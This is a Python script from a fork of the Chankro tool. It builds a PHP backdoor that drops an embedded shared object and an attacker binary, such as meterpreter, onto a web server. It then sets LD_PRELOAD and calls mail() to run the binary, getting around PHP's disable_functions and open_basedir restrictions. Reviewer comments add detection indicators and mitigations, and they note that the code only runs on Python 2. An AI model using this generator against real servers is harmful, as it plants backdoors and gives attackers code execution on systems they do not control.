forked from TarlogicSecurity/Chankro
chankro.py
######## Chankro v0.4 #######
# [+] Bypass disable_functions
# [+] Bypass open_basedir
##############################
# @TheXC3LL #
##############################
import argparse
import base64
import os
# Generator script: writes one PHP file that embeds two base64 blobs (the
# bundled hook32.so/hook64.so and an operator-supplied binary). When that PHP
# file is executed it drops both blobs to disk, sets the CHANKRO and LD_PRELOAD
# environment variables with putenv(), and then calls mail().
#
# Defender notes (all derived from the strings built below):
#   * On-disk artifacts: <path>/chankro.so and <path>/acpid.socket, written by
#     the PHP process into the directory given with --path.
#   * Source-level indicator: a PHP file containing putenv('LD_PRELOAD=...')
#     followed by a mail() call, alongside large base64 string literals.
#   * The technique depends on putenv() and mail() being callable; adding them
#     to disable_functions where the application does not need them, and
#     alerting on web-server child processes that start with LD_PRELOAD set,
#     addresses it.
#   * NOTE(review): hookNN.so is not part of this listing; presumably it reads
#     CHANKRO and runs the file it names. Confirm against the repository.
parser = argparse.ArgumentParser(description='Generate PHP backdoor')
parser.add_argument('--arch', dest='arch',help='Architecture (32 or 64)')
parser.add_argument('--input', dest='meter', help='Binary to be executed (p.e. meterpreter)')
parser.add_argument('--output', dest='out', help='PHP filename')
parser.add_argument('--path', dest='pati', help='Absolute path')
args = parser.parse_args()
# path where the tool is installed
script_path = os.path.dirname(os.path.realpath(__file__))
print("\n\n -=[ Chankro ]=-\n -={ @TheXC3LL }=-\n\n")

# --input: the binary to embed. It is read whole and base64-encoded.
# Every error path below calls exit() with no argument, so the process still
# ends with status 0 after printing an error.
if not args.meter:
    print("[!] Error: please select a valid file as input")
    exit()
try:
    with open(args.meter, "rb") as file:
        encoded_shell = base64.b64encode(file.read())
except:  # bare except: hides the real cause and also catches KeyboardInterrupt
    print("[!] Error: file could not be opened")
    exit()

# --output: the PHP file to generate. The file is created/truncated here,
# before --arch and --path are validated, so a later error exit leaves an
# empty file behind and the handle is not explicitly closed on that path.
if not args.out:
    print("[!] Error: please select a valid file as output")
    exit()
try:
    if (os.path.isabs(args.out)):
        outfile = open(args.out, "w") # absolute path provided
    else:
        outfile = open(os.getcwd() + '/' + args.out, "w") # relative path provided
except:  # bare except, same caveat as above
    print("[!] Error: file could not be created")
    exit()

# --arch: only the literal strings "32" and "64" are accepted; the value
# selects hook32.so or hook64.so from the directory this script lives in.
if not args.arch:
    print("[!] Error: select architecture (64 or 32)")
    exit()
else:
    if args.arch != "32" and args.arch != "64":
        print("[!] Error: unknow architecture")
        exit()
    else:
        archi = script_path + "/hook" + args.arch + ".so"

# --path: directory on the target host where the PHP file will write its two
# payload files. The value is not validated here (the help text says
# "Absolute path", but nothing enforces it).
if not args.pati:
    print("[!] Error: remote path")
    exit()

# Read and encode the bundled hook library. A missing hookNN.so raises an
# unhandled exception here; unlike the reads above there is no try/except.
with open(archi, "rb") as bicho:
    encoded_bicho = base64.b64encode(bicho.read())

# Assemble the PHP source by plain string concatenation.
# NOTE(review): base64.b64encode returns bytes on Python 3, so these str + bytes
# concatenations only succeed on Python 2; as listed, the script is
# Python 2 code despite the print() call syntax.
# args.pati is pasted verbatim into single-quoted PHP string literals; no
# escaping is applied.
head = "<?php\n $hook = '" + encoded_bicho + "';\n"
body1 = "$meterpreter = '" + encoded_shell + "';\n"
# The two file_put_contents() calls are what create the on-disk artifacts.
body2 = "file_put_contents('" + args.pati + "/chankro.so', base64_decode($hook));\n"
body3 = "file_put_contents('" + args.pati + "/acpid.socket', base64_decode($meterpreter));\n"
# CHANKRO carries the location of the dropped binary; LD_PRELOAD names the
# dropped shared object so the dynamic loader loads it into any child process.
cosa3 = "putenv('CHANKRO=" + args.pati + "/acpid.socket');\n"
tail1 = "putenv('LD_PRELOAD=" + args.pati + "/chankro.so');\n"
# mail() is the trigger: on Unix hosts PHP's mail() starts the configured
# sendmail program as a child process, which inherits the environment set
# above. The four 'a' arguments are throwaway values.
tail2 = "mail('a','a','a','a');?>"
print("[+] Binary file: " + args.meter)
print("[+] Architecture: x" + args.arch)
print("[+] Final PHP: " + args.out + "\n\n")
outfile.write(head + body1 + body2 + body3 + cosa3 + tail1 + tail2)
outfile.close()
print("[+] File created!")